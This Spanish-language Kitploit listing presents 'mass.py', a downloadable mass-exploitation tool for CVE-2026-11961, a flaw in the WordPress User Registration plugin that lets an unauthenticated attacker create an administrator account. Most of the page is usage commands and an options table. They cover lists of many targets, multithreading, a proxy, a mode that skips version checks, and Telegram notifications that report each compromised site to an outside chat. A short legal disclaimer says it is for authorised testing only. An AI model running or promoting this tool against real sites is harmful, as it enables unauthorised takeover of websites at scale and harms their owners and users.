Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-11961 — CVE-2026-11961 — UserRegistration: WordPress User Registration <= 5.2.2 Escalada de privilegios. Roles de membresía mal configurados → Creación de administrador no autenticado → Compromiso del sitio. CVSS 8.1 | Kitploit
Herramientas/GitHubGitHub/johenlastgen-jlg/cve-2026-11961
Escalada de PrivilegiosEscáneres de VulnerabilidadesAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónMala Configuración

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub
johenlastgen-jlg/cve-2026-11961

CVE-2026-11961

CVE-2026-11961 — UserRegistration: WordPress User Registration <= 5.2.2 Escalada de privilegios. Roles de membresía mal configurados → Creación de administrador no autenticado → Compromiso del sitio. CVSS 8.1

Ver Repositorio
16hace 1 mesAún no revisado

CVE-2026-11961

Herramienta de explotación masiva para CVE-2026-11961 que afecta al plugin de WordPress User Registration & Membership.

Características

  • Detección de versión del plugin
  • Soporte para un único objetivo
  • Procesamiento de objetivos por lotes
  • Soporte multi-hilo
  • Credenciales aleatorias o personalizadas
  • Soporte de proxy HTTP/HTTPS
  • Configuración de tiempo de espera de solicitudes
  • Salida JSONL
  • Soporte de archivo de registro
  • Notificaciones de Telegram
  • Modo forzado (--force)

Uso

root@kitploit:~
# Show help
python3 mass.py -h

# Single target
python3 mass.py -u https://target.com

# Single target with custom credentials
python3 mass.py \
-u https://target.com \
--username admin \
--password "StrongPassword123!"

# Multiple targets
python3 mass.py -l targets.txt -t 20

# Save successful results
python3 mass.py -l targets.txt -o results.jsonl

# Write log file
python3 mass.py -l targets.txt --log exploit.log

# Telegram notifications
python3 mass.py \
-l targets.txt \
--tg-token YOUR_BOT_TOKEN \
--tg-chat YOUR_CHAT_ID

# Proxy
python3 mass.py \
-u https://target.com \
--proxy http://127.0.0.1:8080

# Force mode
python3 mass.py -u https://target.com --force

Opciones

Aviso legal

Este proyecto se proporciona únicamente para evaluaciones de seguridad autorizadas, investigación defensiva de seguridad y validación de vulnerabilidades.

Al utilizar este software, confirmas que tienes autorización explícita para evaluar los sistemas objetivo. El acceso no autorizado a sistemas informáticos está prohibido y puede violar las leyes aplicables.

El autor y los colaboradores no fomentan ni toleran el uso no autorizado de este proyecto y no asumen responsabilidad ni obligación alguna por el mal uso, daños o consecuencias legales derivados de su utilización.

Autor

JohenLastGen JLG NETWORK

Descargar herramienta
OpciónDescripción
-h, --helpMuestra el mensaje de ayuda y sale
-u, --urlURL de un único objetivo
-l, --listArchivo que contiene URLs objetivo (una por línea)
--usernameNombre de usuario administrador (por defecto: generado aleatoriamente)
--passwordContraseña de administrador (por defecto: generada aleatoriamente)
-t, --threadsNúmero de hilos concurrentes (por defecto: 5)
--timeoutTiempo de espera de solicitud en segundos (por defecto: 15)
-o, --outputGuarda los resultados exitosos en un archivo JSONL
--logGuarda los registros de consola en un archivo
--proxyProxy HTTP/HTTPS (p. ej. http://127.0.0.1:8080)
--forceOmite la validación de versión y continúa el procesamiento
--tg-tokenToken del Bot de Telegram
--tg-chatID del Chat de Telegram